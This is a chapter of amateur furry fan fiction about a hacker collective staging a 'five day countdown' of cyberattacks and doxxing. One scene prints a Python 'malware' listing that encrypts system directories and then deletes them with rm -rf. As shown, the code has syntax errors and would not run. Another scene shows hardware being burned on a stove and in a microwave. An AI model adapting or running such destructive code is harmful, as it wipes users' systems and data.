Chapter 2: Warning

Story by Tsociety on SoFurry

, , , , ,

#2 of The hack book 3: The Citadel

Here is Chapter 2, hope you enjoy!


"Hello Mr Zhang," Jake said as he shaked his hand, Zhang was a red panda who was wearing a dark blue suit and a grey tie. Everyone sat down while Jake began to start the presentation.

"As we all know, the security of the Citadel is adequate for most attacks that hackers are doing, however, servers are still needing some updates..." Jake explained.

An hour later..

"Which will also reduce the shipping cost while reducing the time taken for the records to be transported." Jake said as he finished his slides.

"Your ambitious Jakie, but how about me and Mr Zhang have a talk about this before we decide on what you are going to do ok?" Jake's supervisor, Gary said.

"Okay," Jake said as he took his tough book and went outside the room. When he reached his cubicle, he used PuTTY to login into his server to check the file download status which was 100%. He then took out his phone and opened Signal.

Signal

Kitcat {Gt the files yet?}

{Yp} Me

{IP is 182.48.201.37} Me

{user is deb} Me

Kitcat {Thks}

Kitcat {DOX is 93% don}

{Grt} Me

{Gtg} Me

Jake put his phone back in his pocket as he went back to managing the servers while waiting for them to complete the meeting.

With Kit...

"I've got the private files, we just need to install the backdoor and run the exploit," Kit said as she typed furiously on her laptop in the hotel room.

"I have the malware ready to go and have Chris ready to DDoS their network," Trent said who was also typing on his laptop to prepare for the attack.

"Great, do you have the video ready Aron?" Kit asked.

"Yep, it's already encoded and I have the Vimeo account ready," Aron replied.

"Good, then we can start the DOX, post the video," Kit said as Aron uploaded the video to Vimeo and let the video play in the background.

"Hello everyone, we are Tsociety. Some of you may have seen our recent announcement about us breaking apart and finally coming to rest, we know that some of you don't want things to end but all things must eventually come to and end. We will not however, leave without putting up a show, for the next five days until Christmas, we will be executing a series of cyber bombings on people who have infiltrated your privacy, sold private data and other nefarious deeds. This is day 1 of the 5 day countdown to Christmas, with our first hack being of one of the biggest data centers called The Citadel revealed to holding records of a large amount of information about the recent cryptocurrency called Furcoin which is nearly matching the value of that of the U.S. dollar. This will change soon since they have been helping to fund their own group of projects, this group is known as the Machina group, there is no trace of them on the internet which is what they have been trying to keep so far and will now be revealed. They have been using these funds to try and break into cloud storage servers like Google Drive, Onecloud, iCloud, Samsung cloud and more. Click on the links below to download their private files," it said in the video as it was uploaded.

"It's already reached twenty thousand views and climbing," Aron said.

"Now launch the malware," Kit said as Trent unloaded the malware and activated it to make sure they have admin access to their servers without them even realising it.

"Malware has been launched, now to get out of here," Trent said as they went out of the room and left the keycard Kit was able to swipe from the cleaner.

"That was thrilling," Kit said as they walked down the street to Jake's house.

"Well we have to hurry up and get the next hack ready, we have until tomorrow at 5 p.m. to complete it and upload the video," Trent said as they arrived at Jake's house.

"Do you think he will mind us breaking in?" Kit asked.

"Definitely, but we will just say that the window was open," Trent said as he typed in 'Jakedoor3.pass' through the mini keyboard for the lock.

"Alright then," Kit said as they walked inside and waited for Jake and Kate to get back from work.

With Kate...

"You got it yet?" Kate asked Jake as they walked home.

"I got it, they already have the video up and should be meeting us at our doorstep," Jake said as he and Kate walked towards their car.

"Great, do you think we can pull off the cyber bombings?" Kate asked.

"We should, it will be our last after all," Jake said as they reached the place to find the door wide open.

"Get your taser and stay behind me," Jake said, he pulled out a baseball bat as they walked cautiously towards the entrance.

"Yes we have their bank accounts, we just need to get their QR codes afterwards to complete their transfers," A female voice said. Jake and Kate calmed down as they both recognised her as Kit.

"Then the plan should work and we have all of their Furcoin after that," A male voice said who both Kate and Jake did not recognise.

"Trent, who is he?" Jake said as he entered his house.

"He is Asher, you recruited him for the Tsociety five day countdown," Trent said as he pointed to a grey otter that was wearing a green shirt and light blue shorts.

"I didn't recruit no shit" Jake said as he raised the baseball bat.

"Why the hell are you here?" Jake asked as he walked closer to Asher.

"I'm here because I want to join Tsociety," he said.

"And what in hell's gate says that we will let you join?" Jake said as he was only a few feet away from Asher.

"Because if you don't then your entire plan will be revealed," Asher said, Jake thought about his answer for a while and lowered his bat.

"Fine, we will let you join," Jake said as put the bat down and Kate kept her Tazer.

"How exactly did you make Kit, Trent and Aron think that I recruted you tough?" Jake asked.

"Simple, two weeks ago you downloaded files from my github, one of those files had a hidden peice of spyware that you activated by trying to use the code to brute force a server password," Asher explained.

"Damn it," Jake said as he remembered downloading that code on his servers.

"Isn't it against GitHub's policy that you upload malware there?" Kit asked.

"Excuse me, but you all are literally planning the hack of the century," Asher defended as they all realised that he had a point.

"Fine, but how exactly will you help?" Jake asked.

"Simple, I have malware that can help you crash the servers to prompt them to take immediate action and allow you to install any other program needed," Asher explained.

"Really? Could you show me the code?" Kate asked as Asher opened the code on his laptop and showed it to them.

'''

#!/usr/bin/env python

import os,time,hashlib,random,base64,

from cryptography.fernet import Fernet

n=0

f=Fernet

dire=['/bin', '/boot', '/cdrom', '/dev', '/etc', '/home', '/lib', '/media' , '/mnt' , '/opt', '/root' , '/sys', '/usr']

def ben():

r=random.randint(1,1834091)

r=235+8*r/23+124*5678

r=r*3/2+346*325*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23

r=235+8*r/23+124*2346*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23

r=235+8*r/23+124*52*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23

r=r*3/2+346*325*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23

r=235+8*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/23+124*55*r/2+124*55*r/23+124*55*r/23+124*55*r/23+124*55

def key():

print('<loading source of entropy...>')

s=time.time()

ben()

e=time.time()

r=r+round((e-s)*100000000000)

k=hashlib.md5(str(r).encode())

k=k.hexdigest()

k=base64.urlsafe_b64encode(bytes(str(k),'utf-8'))

time.sleep(2)

print('')

print('')

print('')

print('<key generated>')

print('')

print('')

print('')

time.sleep(1.2)

return(k)

def encdir(dire,key):

print('encrypting %s...'%dire)

os.system('zip enc -r %s'%dire)

fd=open('enc.zip','rb').read()

e=f(key).encrypt(fd)

open('enc.zip','wb').write(e)

os.system('rm -rf %s'%dire)

While True:

n+=1

encdir(dire[n], key())

if n>=13:

break

'''

It showed on the computer as Kate reviewed the code.

"It would definitely stoptheir servers," Kate said as she finished reading through the code.

"Exactly, and since I was able to gain access to the servers, I can upload and run the malware," Asher replied as he took his laptop and closed it.

"Alright, then we have day 2 covered, you all can go" Jake said as Trent, Aron and Kit grabbed their laptops and left, Asher also grabbed his laptop and left as Jake typed on his phone.

Signal

Milid{I am arving}

{We hv compted} Me

{u jst need u 2 snd me the .php fils} Me

Milid{ok}

Milid{I wil hed bck}

[Gd} Me

Jake typed as the kept his phone in his pocket and changed the password of his door.

With Asher...

Asher walked down the streets as he took out his phone.

Signal

Maxn{How was work?}

{It was fine} Me

{Made some new friends} Me

Maxn{That's great!}

Maxn{Will you be around for Christmas?}

{I may not} Me

{It will be a very busy week} Me

Maxn{Oh, Okay then}

Maxn{Bye}

[Bye} Me

Asher finished, feeling slightly guilty that he would have to be away from his cousin. 'Maybe I could find a way to free up some time to see her' he thought.

"Oof! Oh, sorry," an arctic wolf said as he picked up his phone which he had dropped from bumping into Asher.

"It's ok, you're using a Librem 5?" Asher asked.

"Yeah, I care a lot about my privacy" she replied.

"I also use a Librem 5, whats your name?" Asher asked.

"Milden, yours?" Milden asked.

"Asher, wanna exchange numbers?" Asher replied.

"Sure," Milden said as he unlocked his phone and exchanged numbers with Asher,

"May as well verify security code while we're at it," Asher said as they scanned the QR code and kept their phones.

"Sorry but I have a bus to catch, bye!" Milden said as he quickly made his way to the bus stop with Asher heading towards his apartment.

Asher arrived at his apartment and booted into his desktop which was running Ubnutu, he noticed that it seemed to take slightly longer to boot into it and the aminations were not as smooth before, as if there was a background program running on it.

'What the hell?' He thought as he opened his terminal and did a memory dump analysis to see exactly what was running on his computer. After some checking, he found a weird program that seemed to be trying to record his screen and was installing a key logger.

'Shit, a rootkit' Asher thought as he unplugged his computer's power cable and began to wipe everything.

He first unplugged the hard drives and SSD's from his computer and snapped the SSD's in half while turning on the stove and placing the hard drives there to erase any magnetic data on them with the heat. He then took out the RAM and snapped those in half while using a tazer to kill the memory, next was his motherboard which he took some pliers for and plucked off each chip on it and placing them in a bowl. He took the bowl to the microwave and placed it inside and set the time to ten minutes.

He slowly watched the microchips burn and spark inside the microwave as he looked around the room to assess the damage he had done to his computer. Carefully taking his burnt hard drives with some tongs and placing them into a bag along with the remains of his computer. He threw them into the trash as he opened a box filled with backup parts that he could use and rebuilt his computer and used his spare usb stick to install Kali Linux on it.

'Who installed a rootkit on my computer?' Asher thought as he was being watched by a hidden security camera in his room.

"I guess Trent was right when he said that he was smart," Chris said as he and Mike were watching Asher to see wether he knew how to detect a rootkit and how to react.

"That's good, we will need everyone to be on high alert since I have news that Ghost Code is back," Mike said looking at the news on his phone.

"Hello everyone, some of you may remember us as Ghost Code, Tsociety was nearly able to take us down a while ago with their little hacks, but we have something far bigger planned. We will be attacking Tsociety with every attack we can come up with, we will not rest until they have failed and we have won. We are, Ghost Code," The video said as Mike and Chris looked at each other in fear.

"This is going to be a problem," Mike said.

"Not when we already have someone with a backdoor into their systems, we already own them," Chris said as he looked at the files on the computers of Ghost Code.

'Milden did a great job of getting a RAT in their system,' Chris thought as they transferred all of their files with one called 'Project:ERASE_inter.pdf'.